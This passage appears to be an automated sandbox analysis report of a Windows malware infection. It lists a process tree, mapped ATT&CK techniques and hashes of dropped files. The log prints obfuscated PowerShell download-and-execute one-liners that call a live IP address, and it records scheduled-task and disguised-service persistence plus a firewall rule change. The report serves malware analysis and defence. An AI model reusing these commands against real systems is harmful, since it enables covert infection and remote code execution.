"C:\Users\Admin\Pictures\Adobe Films\Arf8Oq9NAlwN9hToewahKzZd.exe"
5⤵
PID:5304

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4720

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4988

C:\Users\Admin\Pictures\Adobe Films\6l_6TITW6M_FWNyv9JNJWShr.exe
"C:\Users\Admin\Pictures\Adobe Films\6l_6TITW6M_FWNyv9JNJWShr.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 624
4⤵
- Program crash
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 632
4⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 672
4⤵
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 808
4⤵
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 876
4⤵
PID:4892

C:\Users\Admin\Pictures\Adobe Films\95GYtErt11V9BcYEb0FsRiir.exe
"C:\Users\Admin\Pictures\Adobe Films\95GYtErt11V9BcYEb0FsRiir.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:3800

C:\Users\Admin\Pictures\Adobe Films\pZtyZVslug6pQkXi0VFh4_wm.exe
"C:\Users\Admin\Pictures\Adobe Films\pZtyZVslug6pQkXi0VFh4_wm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1408

C:\Users\Admin\Pictures\Adobe Films\oqDAZds_7fr2iMuM3zYngwwO.exe
"C:\Users\Admin\Pictures\Adobe Films\oqDAZds_7fr2iMuM3zYngwwO.exe"
3⤵
- Executes dropped EXE
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 460
4⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 480
4⤵
PID:3036

C:\Users\Admin\Pictures\Adobe Films\0ymbQYc8RsS99DBvOdYSQjSF.exe
"C:\Users\Admin\Pictures\Adobe Films\0ymbQYc8RsS99DBvOdYSQjSF.exe"
3⤵
- Executes dropped EXE
PID:2536

C:\Users\Admin\Pictures\Adobe Films\EbCMBNv6S7MFZ2OS3eEGYonW.exe
"C:\Users\Admin\Pictures\Adobe Films\EbCMBNv6S7MFZ2OS3eEGYonW.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3548

C:\Users\Admin\Pictures\Adobe Films\EbCMBNv6S7MFZ2OS3eEGYonW.exe
"C:\Users\Admin\Pictures\Adobe Films\EbCMBNv6S7MFZ2OS3eEGYonW.exe"
4⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 564
5⤵
PID:5348

C:\Users\Admin\Pictures\Adobe Films\yJELtTPryMdnuZ3qwXJ3rGeB.exe
"C:\Users\Admin\Pictures\Adobe Films\yJELtTPryMdnuZ3qwXJ3rGeB.exe"
3⤵
- Executes dropped EXE
PID:3580

C:\Users\Admin\Pictures\Adobe Films\LArQdSTz9GSLeONJ_Pu1Dbtc.exe
"C:\Users\Admin\Pictures\Adobe Films\LArQdSTz9GSLeONJ_Pu1Dbtc.exe"
3⤵
- Executes dropped EXE
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 464
4⤵
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 472
4⤵
PID:5080

C:\Users\Admin\Pictures\Adobe Films\XvXBF8YUd0oQvWpIWdAM70te.exe
"C:\Users\Admin\Pictures\Adobe Films\XvXBF8YUd0oQvWpIWdAM70te.exe"
3⤵
- Executes dropped EXE
PID:820

C:\Users\Admin\AppData\Local\Temp\6f29e1a4-2dec-45cf-9574-d415c4f0aead.exe
"C:\Users\Admin\AppData\Local\Temp\6f29e1a4-2dec-45cf-9574-d415c4f0aead.exe"
4⤵
PID:1588

C:\Users\Admin\Pictures\Adobe Films\yu6kHMrVnZIrmrTtsHDwllzE.exe
"C:\Users\Admin\Pictures\Adobe Films\yu6kHMrVnZIrmrTtsHDwllzE.exe"
3⤵
PID:4336

C:\Users\Admin\Pictures\Adobe Films\DQhn8kL3DdHL8B7EWklCBXvL.exe
"C:\Users\Admin\Pictures\Adobe Films\DQhn8kL3DdHL8B7EWklCBXvL.exe"
3⤵
PID:4248

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4048

C:\Users\Admin\Pictures\Adobe Films\pr5WCZT2b9JNj8wp6S4NA5sF.exe
"C:\Users\Admin\Pictures\Adobe Films\pr5WCZT2b9JNj8wp6S4NA5sF.exe"
3⤵
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:4556

C:\Users\Admin\Pictures\Adobe Films\FjYZ1L9PQ1oXe5XOCGXCc8_t.exe
"C:\Users\Admin\Pictures\Adobe Films\FjYZ1L9PQ1oXe5XOCGXCc8_t.exe"
3⤵
PID:4188

C:\Users\Admin\Pictures\Adobe Films\OY9X4yfkpWrt1KFA4j32xkgj.exe
"C:\Users\Admin\Pictures\Adobe Films\OY9X4yfkpWrt1KFA4j32xkgj.exe"
3⤵
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 460
4⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 468
4⤵
PID:1028

C:\Users\Admin\Pictures\Adobe Films\RJ3Jq0ay9kQUTSVoM3SkohPy.exe
"C:\Users\Admin\Pictures\Adobe Films\RJ3Jq0ay9kQUTSVoM3SkohPy.exe"
3⤵
PID:4172

C:\Users\Admin\Pictures\Adobe Films\frlLyJHhgRUkUXqD4vLBq_5E.exe
"C:\Users\Admin\Pictures\Adobe Films\frlLyJHhgRUkUXqD4vLBq_5E.exe"
3⤵
PID:4120

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 604
4⤵
PID:5644

C:\Users\Admin\Pictures\Adobe Films\qxdDrrCSi7btcmbP665oFDjD.exe
"C:\Users\Admin\Pictures\Adobe Films\qxdDrrCSi7btcmbP665oFDjD.exe"
3⤵
- Executes dropped EXE
PID:4100

C:\Users\Admin\AppData\Local\Temp\7zS1CF2.tmp\Install.exe
.\Install.exe
4⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\7zS32DB.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:4320

C:\Users\Admin\Pictures\Adobe Films\CeHkR2XJS0DXOymV9vLuVJXq.exe
"C:\Users\Admin\Pictures\Adobe Films\CeHkR2XJS0DXOymV9vLuVJXq.exe"
3⤵
- Executes dropped EXE
PID:1856

C:\Users\Admin\Pictures\Adobe Films\EaazESuGFEPWgefydKJP1kcG.exe
"C:\Users\Admin\Pictures\Adobe Films\EaazESuGFEPWgefydKJP1kcG.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hjlkiijv\
4⤵
PID:5300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xkgifjkr.exe" C:\Windows\SysWOW64\hjlkiijv\
4⤵
PID:5508

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create hjlkiijv binPath= "C:\Windows\SysWOW64\hjlkiijv\xkgifjkr.exe /d\"C:\Users\Admin\Pictures\Adobe Films\EaazESuGFEPWgefydKJP1kcG.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5820

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description hjlkiijv "wifi internet conection"
4⤵
PID:5904

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start hjlkiijv
4⤵
PID:6108

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:3752

C:\Users\Admin\yqwxfxyn.exe
"C:\Users\Admin\yqwxfxyn.exe" /d"C:\Users\Admin\Pictures\Adobe Films\EaazESuGFEPWgefydKJP1kcG.exe"
4⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\edxssgta.exe" C:\Windows\SysWOW64\hjlkiijv\
5⤵
PID:5192

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config hjlkiijv binPath= "C:\Windows\SysWOW64\hjlkiijv\edxssgta.exe /d\"C:\Users\Admin\yqwxfxyn.exe\""
5⤵
PID:1684

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start hjlkiijv
5⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1248
4⤵
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3036 -ip 3036
1⤵
PID:3776

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:2544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 600
3⤵
- Program crash
PID:800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2544 -ip 2544
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3036 -ip 3036
1⤵
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3036 -ip 3036
1⤵
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3036 -ip 3036
1⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3036 -ip 3036
1⤵
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3036 -ip 3036
1⤵
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3036 -ip 3036
1⤵
PID:2464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3036 -ip 3036
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3036 -ip 3036
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3036 -ip 3036
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3036 -ip 3036
1⤵
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3036 -ip 3036
1⤵
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3036 -ip 3036
1⤵
PID:540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3036 -ip 3036
1⤵
PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3036 -ip 3036
1⤵
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3036 -ip 3036
1⤵
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3036 -ip 3036
1⤵
PID:748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3036 -ip 3036
1⤵
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3036 -ip 3036
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3036 -ip 3036
1⤵
PID:1568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3036 -ip 3036
1⤵
PID:824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1792 -ip 1792
1⤵
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792
1⤵
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1792 -ip 1792
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1792 -ip 1792
1⤵
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1792 -ip 1792
1⤵
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1792 -ip 1792
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1792 -ip 1792
1⤵
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1792 -ip 1792
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792
1⤵
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1792 -ip 1792
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792
1⤵
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1792 -ip 1792
1⤵
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1792 -ip 1792
1⤵
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1792 -ip 1792
1⤵
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1792 -ip 1792
1⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1792 -ip 1792
1⤵
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2256 -ip 2256
1⤵
PID:528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2256 -ip 2256
1⤵
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2256 -ip 2256
1⤵
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2256 -ip 2256
1⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2256 -ip 2256
1⤵
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2256 -ip 2256
1⤵
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2256 -ip 2256
1⤵
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2256 -ip 2256
1⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2256 -ip 2256
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2256 -ip 2256
1⤵
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2256 -ip 2256
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2256 -ip 2256
1⤵
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2256 -ip 2256
1⤵
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2256 -ip 2256
1⤵
PID:424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2256 -ip 2256
1⤵
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2256 -ip 2256
1⤵
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2256 -ip 2256
1⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2256 -ip 2256
1⤵
PID:3136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2256 -ip 2256
1⤵
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2256 -ip 2256
1⤵
PID:1524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2256 -ip 2256
1⤵
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2256 -ip 2256
1⤵
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2256 -ip 2256
1⤵
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2256 -ip 2256
1⤵
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2256 -ip 2256
1⤵
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1180 -ip 1180
1⤵
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1796 -ip 1796
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4180 -ip 4180
1⤵
PID:4724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 432 -ip 432
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1796 -ip 1796
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1180 -ip 1180
1⤵
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4180 -ip 4180
1⤵
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 432 -ip 432
1⤵
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2516 -ip 2516
1⤵
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4120 -ip 4120
1⤵
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1180 -ip 1180
1⤵
PID:5532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "95GYtErt11V9BcYEb0FsRiir" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\95GYtErt11V9BcYEb0FsRiir.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Documents and Settings\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2444 -ip 2444
1⤵
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1180 -ip 1180
1⤵
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2256 -ip 2256
1⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4664 -ip 4664
1⤵
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2256 -ip 2256
1⤵
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1180 -ip 1180
1⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4664 -ip 4664
1⤵
PID:5704

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
40f7cf8dd66ccb50e164b4609519adc6

SHA1
9df0386f474abd5c8a7a3d822ca865922d20d03d

SHA256
6d29580ba0880af8b20eb65340137309234e5f2b8efed14cd71aa1f79fb7eed9

SHA512
9d3dac3250dce2627ce095003418695709894f327d9dbba45d7d96c486e95c5ddb8f21b62c558a1ca0cbac1b5c60b3255e7b626ac69baa29fdc3a5eb90c7c992

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
254199404fccfb91d18c929ce584eef7

SHA1
782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

SHA256
6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

SHA512
a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
254199404fccfb91d18c929ce584eef7

SHA1
782d4fe5b1f4cd12af5fb6bc7cbd0392d205fe07

SHA256
6348d04d59e1303a3aa2574cb2f9d98d3d91347d4f03444a15962062dccb1fdd

SHA512
a20f98e59f2e5a16191befd7bf8bd52f5789653b9c1c2917c413d5ca5c2cbfbfa7bc2e8126ef433a979f72bbf6a3fa5b43de8a1eaa490692610101df10ea14a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

